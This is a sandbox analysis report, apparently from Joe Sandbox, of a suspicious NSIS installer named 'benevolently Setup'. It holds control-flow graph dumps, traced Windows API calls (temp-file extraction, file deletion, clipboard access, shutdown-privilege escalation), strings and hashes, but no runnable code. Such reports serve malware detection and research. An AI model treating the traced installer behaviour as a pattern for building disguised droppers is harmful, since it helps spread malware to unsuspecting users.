5097->5098 5099 401910 5098->5099 3699 402682 3700 402689 3699->3700 3706 4028fe 3699->3706 3707 402a9f 3700->3707 3702 402690 3703 40269f SetFilePointer 3702->3703 3704 4026af 3703->3704 3703->3706 3710 405ec3 wsprintfA 3704->3710 3711 405f87 3707->3711 3709 402ab4 3709->3702 3710->3706 3725 405f94 3711->3725 3712 4061b6 3713 4061cb 3712->3713 3744 405f65 lstrcpynA 3712->3744 3713->3709 3715 406190 lstrlenA 3715->3725 3717 405f87 10 API calls 3717->3715 3720 4060ac GetSystemDirectoryA 3720->3725 3721 4060bf GetWindowsDirectoryA 3721->3725 3723 405f87 10 API calls 3723->3725 3724 406139 lstrcatA 3724->3725 3725->3712 3725->3715 3725->3717 3725->3720 3725->3721 3725->3723 3725->3724 3726 4060f3 SHGetSpecialFolderLocation 3725->3726 3728 405e4c 3725->3728 3733 4061cf 3725->3733 3742 405ec3 wsprintfA 3725->3742 3743 405f65 lstrcpynA 3725->3743 3726->3725 3727 40610b SHGetPathFromIDListA CoTaskMemFree 3726->3727 3727->3725 3745 405deb 3728->3745 3731 405e80 RegQueryValueExA RegCloseKey 3732 405eaf 3731->3732 3732->3725 3739 4061db 3733->3739 3734 406243 3735 406247 CharPrevA 3734->3735 3737 406262 3734->3737 3735->3734 3736 406238 CharNextA 3736->3734 3736->3739 3737->3725 3739->3734 3739->3736 3740 406226 CharNextA 3739->3740 3741 406233 CharNextA 3739->3741 3749 405928 3739->3749 3740->3739 3741->3736 3742->3725 3743->3725 3744->3713 3746 405dfa 3745->3746 3747 405e03 RegOpenKeyExA 3746->3747 3748 405dfe 3746->3748 3747->3748 3748->3731 3748->3732 3750 40592e 3749->3750 3751 405941 3750->3751 3752 405934 CharNextA 3750->3752 3751->3739 3752->3750 5100 401502 5101 40150a 5100->5101 5103 40151d 5100->5103 5102 402a9f 17 API calls 5101->5102 5102->5103 3765 401c04 3766 402a9f 17 API calls 3765->3766 3767 401c0b 3766->3767 3768 402a9f 17 API calls 3767->3768 3769 401c18 3768->3769 3770 401c2d 3769->3770 3771 402ac1 17 API calls 3769->3771 3772 401c3d 3770->3772 3775 402ac1 17 API calls 3770->3775 3771->3770 3773 401c94 3772->3773 3774 401c48 3772->3774 3787 402ac1 
3773->3787 3776 402a9f 17 API calls 3774->3776 3775->3772 3778 401c4d 3776->3778 3780 402a9f 17 API calls 3778->3780 3782 401c59 3780->3782 3781 402ac1 17 API calls 3783 401ca2 FindWindowExA 3781->3783 3784 401c84 SendMessageA 3782->3784 3785 401c66 SendMessageTimeoutA 3782->3785 3786 401cc0 3783->3786 3784->3786 3785->3786 3788 402acd 3787->3788 3789 405f87 17 API calls 3788->3789 3790 402aee 3789->3790 3791 401c99 3790->3791 3792 4061cf 5 API calls 3790->3792 3791->3781 3792->3791 5104 404a09 GetDlgItem GetDlgItem 5105 404a5b 7 API calls 5104->5105 5112 404c73 5104->5112 5106 404af1 SendMessageA 5105->5106 5107 404afe DeleteObject 5105->5107 5106->5107 5108 404b07 5107->5108 5109 404b3e 5108->5109 5111 405f87 17 API calls 5108->5111 5113 404026 18 API calls 5109->5113 5110 404e03 5116 404e15 5110->5116 5117 404e0d SendMessageA 5110->5117 5118 404b20 SendMessageA SendMessageA 5111->5118 5115 404d57 5112->5115 5123 404957 5 API calls 5112->5123 5137 404ce4 5112->5137 5114 404b52 5113->5114 5119 404026 18 API calls 5114->5119 5115->5110 5120 404db0 SendMessageA 5115->5120 5144 404c66 5115->5144 5126 404e27 ImageList_Destroy 5116->5126 5127 404e2e 5116->5127 5140 404e3e 5116->5140 5117->5116 5118->5108 5138 404b60 5119->5138 5124 404dc5 SendMessageA 5120->5124 5120->5144 5121 40408d 8 API calls 5125 404ff9 5121->5125 5122 404d49 SendMessageA 5122->5115 5123->5137 5130 404dd8 5124->5130 5126->5127 5128 404e37 GlobalFree 5127->5128 5127->5140 5128->5140 5129 404c34 GetWindowLongA SetWindowLongA 5133 404c4d 5129->5133 5141 404de9 SendMessageA 5130->5141 5131 404fad 5132 404fbf ShowWindow GetDlgItem ShowWindow 5131->5132 5131->5144 5132->5144 5134 404c53 ShowWindow 5133->5134 5135 404c6b 5133->5135 5155 40405b SendMessageA 5134->5155 5156 40405b SendMessageA 5135->5156 5137->5115 5137->5122 5138->5129 5139 404baf SendMessageA 5138->5139 5142 404c2e 5138->5142 5145 404beb SendMessageA 5138->5145 5146 404bfc SendMessageA 5138->5146 5139->5138 5140->5131 5147 4049d7 4 API 
calls 5140->5147 5151 404e79 5140->5151 5141->5110 5142->5129 5142->5133 5144->5121 5145->5138 5146->5138 5147->5151 5148 404f83 InvalidateRect 5148->5131 5149 404f99 5148->5149 5157 404912 5149->5157 5150 404ea7 SendMessageA 5154 404ebd 5150->5154 5151->5150 5151->5154 5153 404f31 SendMessageA SendMessageA 5153->5154 5154->5148 5154->5153 5155->5144 5156->5112 5160 40484d 5157->5160 5159 404927 5159->5131 5161 404863 5160->5161 5162 405f87 17 API calls 5161->5162 5163 4048c7 5162->5163 5164 405f87 17 API calls 5163->5164 5165 4048d2 5164->5165 5166 405f87 17 API calls 5165->5166 5167 4048e8 lstrlenA wsprintfA SetDlgItemTextA 5166->5167 5167->5159 5168 401490 5169 40508c 24 API calls 5168->5169 5170 401497 5169->5170 5171 401d95 GetDC 5172 402a9f 17 API calls 5171->5172 5173 401da7 GetDeviceCaps MulDiv ReleaseDC 5172->5173 5174 402a9f 17 API calls 5173->5174 5175 401dd8 5174->5175 5176 405f87 17 API calls 5175->5176 5177 401e15 CreateFontIndirectA 5176->5177 5178 402577 5177->5178 5179 404496 5180 4044c2 5179->5180 5181 4044d3 5179->5181 5240 405665 GetDlgItemTextA 5180->5240 5182 4044df GetDlgItem 5181->5182 5189 40453e 5181->5189 5185 4044f3 5182->5185 5184 4044cd 5187 4061cf 5 API calls 5184->5187 5188 404507 SetWindowTextA 5185->5188 5192 405996 4 API calls 5185->5192 5186 404622 5237 4047cc 5186->5237 5242 405665 GetDlgItemTextA 5186->5242 5187->5181 5193 404026 18 API calls 5188->5193 5189->5186 5194 405f87 17 API calls 5189->5194 5189->5237 5191 40408d 8 API calls 5196 4047e0 5191->5196 5197 4044fd 5192->5197 5198 404523 5193->5198 5199 4045b2 SHBrowseForFolderA 5194->5199 5195 404652 5200 4059eb 18 API calls 5195->5200 5197->5188 5204 4058fd 3 API calls 5197->5204 5201 404026 18 API calls 5198->5201 5199->5186 5202 4045ca CoTaskMemFree 5199->5202 5203 404658 5200->5203 5205 404531 5201->5205 5206 4058fd 3 API calls 5202->5206 5243 405f65 lstrcpynA 5203->5243 5204->5188 5241 40405b SendMessageA 5205->5241 5208 4045d7 5206->5208 5211 40460e SetDlgItemTextA 

Control-flow Graph

• Executed
• Not Executed
APIs
• SetErrorMode.KERNELBASE ref: 00403216
• GetVersion.KERNEL32 ref: 0040321C
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040324F
• #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040328B
• OleInitialize.OLE32(00000000), ref: 00403292
• SHGetFileInfoA.SHELL32(00429830,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032AE
• GetCommandLineA.KERNEL32(benevolently Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004032C3
• GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\asXlZG3aW6.exe",00000000,?,00000006,00000008,0000000A), ref: 004032D6
• CharNextA.USER32(00000000,"C:\Users\user\Desktop\asXlZG3aW6.exe",00000020,?,00000006,00000008,0000000A), ref: 00403301
• GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 004033FE
• GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 0040340F
• lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040341B
• GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040342F
• lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403437
• SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403448
• SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403450
• DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403464
  • Part of subcall function 004062FD: GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
  • Part of subcall function 004062FD: GetProcAddress.KERNEL32(00000000,?), ref: 0040632A
  • Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,benevolently Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72
  • Part of subcall function 004037B5: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243,1033,benevolently Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,benevolently Setup: Installing,00000000,00000002,761F3410), ref: 004038A5
  • Part of subcall function 004037B5: lstrcmpiA.KERNEL32(?,.exe), ref: 004038B8
  • Part of subcall function 004037B5: GetFileAttributesA.KERNEL32(Call), ref: 004038C3
  • Part of subcall function 004037B5: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243), ref: 0040390C
  • Part of subcall function 004037B5: RegisterClassA.USER32(0042EBA0), ref: 00403949
  • Part of subcall function 004036DB: CloseHandle.KERNEL32(000002C0,00403512,?,?,00000006,00000008,0000000A), ref: 004036E6
• OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 00403512
• ExitProcess.KERNEL32 ref: 00403533
• GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403650
• OpenProcessToken.ADVAPI32(00000000), ref: 00403657
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040366F
• AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 0040368E
• ExitWindowsEx.USER32(00000002,80040002), ref: 004036B2
• ExitProcess.KERNEL32 ref: 004036D5
  • Part of subcall function 00405681: MessageBoxIndirectA.USER32(0040A218), ref: 004056DC
Strings
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: Process$ExitFileHandle$EnvironmentModulePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpilstrcpyn
• String ID: "$"C:\Users\user\Desktop\asXlZG3aW6.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243$C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243\knejse\Trifliernes$C:\Users\user\Desktop$C:\Users\user\Desktop\asXlZG3aW6.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`K v$benevolently Setup$~nsu
• API String ID: 3855923921-3335253828
• Opcode ID: a62ce931ca2efa7a527a2a800e7e0040844f4c2c3ebfe2fb719c727999237710
• Instruction ID: 41c275c355797b12fd9b138c60a2ad170ddd3a1f93bd6a9867a2704463122372
• Opcode Fuzzy Hash: a62ce931ca2efa7a527a2a800e7e0040844f4c2c3ebfe2fb719c727999237710
• Instruction Fuzzy Hash: 0DC1E470604741AAD7216F759E49B2F3EACAF45706F44053FF581B61E2CB7C8A098B2E

Control-flow Graph

• Executed
• Not Executed
APIs
• GetDlgItem.USER32(?,00000403), ref: 00405229
• GetDlgItem.USER32(?,000003EE), ref: 00405238
• GetClientRect.USER32(?,?), ref: 00405275
• GetSystemMetrics.USER32(00000002), ref: 0040527C
• SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040529D
• SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052AE
• SendMessageA.USER32(?,00001001,00000000,?), ref: 004052C1
• SendMessageA.USER32(?,00001026,00000000,?), ref: 004052CF
• SendMessageA.USER32(?,00001024,00000000,?), ref: 004052E2
• ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405304
• ShowWindow.USER32(?,00000008), ref: 00405318
• GetDlgItem.USER32(?,000003EC), ref: 00405339
• SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405349
• SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405362
• SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040536E
• GetDlgItem.USER32(?,000003F8), ref: 00405247
  • Part of subcall function 0040405B: SendMessageA.USER32(00000028,?,00000001,00403E8B), ref: 00404069
• GetDlgItem.USER32(?,000003EC), ref: 0040538A
• CreateThread.KERNELBASE(00000000,00000000,Function_0000515E,00000000), ref: 00405398
• CloseHandle.KERNELBASE(00000000), ref: 0040539F
• ShowWindow.USER32(00000000), ref: 004053C2
• ShowWindow.USER32(?,00000008), ref: 004053C9
• ShowWindow.USER32(00000008), ref: 0040540F
• SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405443
• CreatePopupMenu.USER32 ref: 00405454
• AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405469
• GetWindowRect.USER32(?,000000FF), ref: 00405489
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054A2
• SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054DE
• OpenClipboard.USER32(00000000), ref: 004054EE
• EmptyClipboard.USER32 ref: 004054F4
• GlobalAlloc.KERNEL32(00000042,?), ref: 004054FD
• GlobalLock.KERNEL32(00000000), ref: 00405507
• SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040551B
• GlobalUnlock.KERNEL32(00000000), ref: 00405534
• SetClipboardData.USER32(00000001,00000000), ref: 0040553F
• CloseClipboard.USER32 ref: 00405545
Strings
• benevolently Setup: Installing, xrefs: 004054BA
Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                    • String ID: benevolently Setup: Installing
                                                                                                                                                                                    • API String ID: 590372296-470378788
                                                                                                                                                                                    • Opcode ID: a43d3a3d4153c9e144370ebfb7e1485c24af32df1aebf0fefb0dd59f9748b4bf
                                                                                                                                                                                    • Instruction ID: ba98567820032f63b871bd6861c5d6e43a3521a54ecc658c1b1e5281d96d67ec
                                                                                                                                                                                    • Opcode Fuzzy Hash: a43d3a3d4153c9e144370ebfb7e1485c24af32df1aebf0fefb0dd59f9748b4bf
                                                                                                                                                                                    • Instruction Fuzzy Hash: D6A14971900608BFDF11AF61DE89AAF7F79EB04354F40403AFA41B61A0CB755E519F68

                                                                                                                                                                                    Control-flow Graph
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DeleteFileA.KERNELBASE(?,?,761F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405756
                                                                                                                                                                                    • lstrcatA.KERNEL32(0042B878,\*.*,0042B878,?,?,761F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040579E
                                                                                                                                                                                    • lstrcatA.KERNEL32(?,0040A014,?,0042B878,?,?,761F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057BF
                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,0040A014,?,0042B878,?,?,761F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057C5
                                                                                                                                                                                    • FindFirstFileA.KERNEL32(0042B878,?,?,?,0040A014,?,0042B878,?,?,761F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057D6
                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405883
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405894
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • \*.*, xrefs: 00405798
                                                                                                                                                                                    • "C:\Users\user\Desktop\asXlZG3aW6.exe", xrefs: 0040572D
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 0040573A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\asXlZG3aW6.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                    • API String ID: 2035342205-2004890466
                                                                                                                                                                                    • Opcode ID: a11e03e59e5fd35a7b3b0442a482093daeb4251b1d727e15f9c9cc7460ea2170
                                                                                                                                                                                    • Instruction ID: 2a0351abb2716448ee460da7bfccfa5d3c7c3698b554042fcfc8e424752a7a40
                                                                                                                                                                                    • Opcode Fuzzy Hash: a11e03e59e5fd35a7b3b0442a482093daeb4251b1d727e15f9c9cc7460ea2170
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2551B132900A04AAEF217B268C45FBF7A78DF42754F14817BF841B61D1D73C8952DEA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(761F3410,0042C0C0,0042BC78,00405A2E,0042BC78,0042BC78,00000000,0042BC78,0042BC78,761F3410,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,761F3410,C:\Users\user\AppData\Local\Temp\), ref: 00406273
                                                                                                                                                                                    • FindClose.KERNELBASE(00000000), ref: 0040627F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                                                                    • Opcode ID: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
                                                                                                                                                                                    • Instruction ID: e0279db6a2f9a876ecb4b02bc738002a428a13ad585e0dc9357aaf1afb57e826
                                                                                                                                                                                    • Opcode Fuzzy Hash: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DD012365060209FC25027786D0C85B7A589F053317118B7FF8AAF21E0C7348CA386DC

                                                                                                                                                                                    Control-flow Graph
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B8E
                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 00403BAB
                                                                                                                                                                                    • DestroyWindow.USER32 ref: 00403BBF
                                                                                                                                                                                    • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BDB
                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403BFC
                                                                                                                                                                                    • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C10
                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403C17
• GetDlgItem.USER32(?,00000001), ref: 00403CC5
• GetDlgItem.USER32(?,00000002), ref: 00403CCF
• SetClassLongA.USER32(?,000000F2,?), ref: 00403CE9
• SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D3A
• GetDlgItem.USER32(?,00000003), ref: 00403DE0
• ShowWindow.USER32(00000000,?), ref: 00403E01
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E13
• EnableWindow.USER32(?,?), ref: 00403E2E
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E44
• EnableMenuItem.USER32(00000000), ref: 00403E4B
• SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E63
• SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E76
• lstrlenA.KERNEL32(benevolently Setup: Installing,?,benevolently Setup: Installing,00000000), ref: 00403EA0
• SetWindowTextA.USER32(?,benevolently Setup: Installing), ref: 00403EAF
• ShowWindow.USER32(?,0000000A), ref: 00403FE3
Strings
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
• String ID: benevolently Setup: Installing
• API String ID: 3282139019-470378788
• Opcode ID: aa8af9cc06094f93f58c9526d7c11b9f91f5042ecf31170c9ab7365bbcb87e59
• Instruction ID: 825bbfaa6b66e15a56cde4951677423d70b10f791e0768be12abaf391e468a8e
• Opcode Fuzzy Hash: aa8af9cc06094f93f58c9526d7c11b9f91f5042ecf31170c9ab7365bbcb87e59
• Instruction Fuzzy Hash: 80C19F71604205AFDB206F22EE45E2B3EBCFB4570AF40053EFA42B11E1CB7999429B1D

Control-flow Graph
control_flow_graph 290 4037b5-4037cd call 4062fd 293 4037e1-403812 call 405e4c 290->293 294 4037cf-4037df call 405ec3 290->294 299 403814-403825 call 405e4c 293->299 300 40382a-403830 lstrcatA 293->300 303 403835-40385e call 403a7a call 4059eb 294->303 299->300 300->303 308 403864-403869 303->308 309 4038e5-4038ed call 4059eb 303->309 308->309 310 40386b-403883 call 405e4c 308->310 315 4038fb-403920 LoadImageA 309->315 316 4038ef-4038f6 call 405f87 309->316 314 403888-40388f 310->314 314->309 317 403891-403893 314->317 319 4039a1-4039a9 call 40140b 315->319 320 403922-403952 RegisterClassA 315->320 316->315 321 4038a4-4038b0 lstrlenA 317->321 322 403895-4038a2 call 405928 317->322 334 4039b3-4039be call 403a7a 319->334 335 4039ab-4039ae 319->335 323 403a70 320->323 324 403958-40399c SystemParametersInfoA CreateWindowExA 320->324 328 4038b2-4038c0 lstrcmpiA 321->328 329 4038d8-4038e0 call 4058fd call 405f65 321->329 322->321 327 403a72-403a79 323->327 324->319 328->329 333 4038c2-4038cc GetFileAttributesA 328->333 329->309 338 4038d2-4038d3 call 405944 333->338 339 4038ce-4038d0 333->339 343 4039c4-4039de ShowWindow call 40628f 334->343 344 403a47-403a48 call 40515e 334->344 335->327 338->329 339->329 339->338 351 4039e0-4039e5 call 40628f 343->351 352 4039ea-4039fc GetClassInfoA 343->352 347 403a4d-403a4f 344->347 349 403a51-403a57 347->349 350 403a69-403a6b call 40140b 347->350 349->335 353 403a5d-403a64 call 40140b 349->353 350->323 351->352 356 403a14-403a37 DialogBoxParamA call 40140b 352->356 357 4039fe-403a0e GetClassInfoA RegisterClassA 352->357 353->335 361 403a3c-403a45 call 403705 356->361 357->356 361->327
APIs
  • Part of subcall function 004062FD: GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
  • Part of subcall function 004062FD: GetProcAddress.KERNEL32(00000000,?), ref: 0040632A
• lstrcatA.KERNEL32(1033,benevolently Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,benevolently Setup: Installing,00000000,00000002,761F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\asXlZG3aW6.exe",00000000), ref: 00403830
• lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243,1033,benevolently Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,benevolently Setup: Installing,00000000,00000002,761F3410), ref: 004038A5
• lstrcmpiA.KERNEL32(?,.exe), ref: 004038B8
